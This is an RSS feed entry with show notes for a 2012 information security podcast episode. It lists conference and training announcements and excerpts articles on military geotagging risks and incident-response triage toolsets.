		<pubDate>Tue, 13 Mar 2012 00:50:16 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3628</guid>
		<description><![CDATA[Episode 617 -&#160;FourSquare Badge, IR Toolsets, Kelihos and DNS Amplification Attacks InfoSec Daily Podcast Episode 617 for March 12, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, and Karthik Rangarajan. &#160; Announcements: How to Rob a Bank in 30 Days or less When: March 14th 2012 Where: http://securityzone.co/webinar-en.html Sign up for [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" id="internal-source-marker_0.7457727495882224" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Episode 617 -&nbsp;FourSquare Badge, IR Toolsets, Kelihos and DNS Amplification Attacks</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 617 for March 12, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, and Karthik Rangarajan.<br />
	</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">How to Rob a Bank in 30 Days or less</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 14th 2012</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><a href="http://securityzone.co/webinar-en.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://securityzone.co/webinar-en.html</span></a></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sign up for the webinar that will probably get b0n3z on that watchlist</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>&nbsp;</p>
<h5 dir="ltr"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></h5>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 23 &#8211; 24, 2012</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.army.mil/article/75165/Geotagging_poses_security_risks/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.army.mil/article/75165/Geotagging_poses_security_risks/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Is a badge on Foursquare worth your life?&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The question was posed by Brittany Brown, social media manager of the Online and Social Media Division at the Office of the Chief of Public Affairs. It may sound outlandish, but in the age of social geotagging, it can be a reality.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There are a number of location-based social media applications and platforms, including Foursquare, Gowalla, SCVNGR, Shopkick, Loopt and Whrrl, currently on the market. They use GPS features, typically in the user&#39;s phone, to publish the person&#39;s location and offer rewards in the form of discounts, badges or points to encourage frequent check-ins.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security risks for the military:</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A deployed service member&#39;s situational awareness includes the world of social media. If a Soldier uploads a photo taken on his or her smartphone to Facebook, they could broadcast the exact location of their unit, said Steve Warren, deputy G2 for the Maneuver Center of Excellence, or MCoE.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Today, in pretty much every single smartphone, there is built-in GPS,&quot; Warren said. &quot;For every picture you take with that phone, it will automatically embed the latitude and longitude within the photograph.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Someone with the right software and the wrong motivation could download the photo and extract the coordinates from the metadata.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Warren cited a real-world example from 2007. When a new fleet of helicopters arrived with an aviation unit at a base in Iraq, some Soldiers took pictures on the flightline, he said. From the photos that were uploaded to the Internet, the enemy was able to determine the exact location of the helicopters inside the compound and conduct a mortar attack, destroying four of the AH-64 Apaches.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://grandstreamdreams.blogspot.com/2012/03/incident-response-toolsets-and.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://grandstreamdreams.blogspot.com/2012/03/incident-response-toolsets-and.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A few months ago I was reading this</span><a href="http://computer-forensics.sans.org/blog/2012/01/19/digital-forensics-case-leads-refs-ex01-and-dfironline"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Digital Forensics Case Leads: ReFS, Ex01, and DFIROnline</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> post and came across the following bit under the Tools section:</span></p>
<p dir="ltr" style="margin-left: 36pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Michael Ahrendt recently released an interesting looking &quot;</span><a href="http://mikeahrendt.blogspot.com/2012/01/automated-triage-utility.html?m=1"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Automated Triage Utility</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">,&quot; written in the AutoIT scripting language. It is a GUI-driven data collection utility designed for live system response. In this regard, it reminds me a lot of Monty McDougal&#39;s</span><a href="http://www.foolmoon.net/security/wft/index.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Windows Forensic Toolchest</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">. They differ in UI and programming language, but aim at the same objective.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I hopped over to take a look at Michael&rsquo;s</span><a href="http://mikeahrendt.blogspot.com/2012/01/automated-triage-utility.html?m=1"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Automated Triage Utility</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and it is pretty cool. You do have some &quot;light&rdquo; building work to do to seed the structure Michael provides with some extra applications but in total it provides a responder a great set of information logs and evidence collection.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While one-click incident assessments are no substitute to a detailed and focused analysis and pick-apart, these toolsets and first-responses may be of significant benefit getting some assessment data to determine scope of impact and breadth incident. With the core data collected an analyst or response team can then plan out additional responses.</span></p>
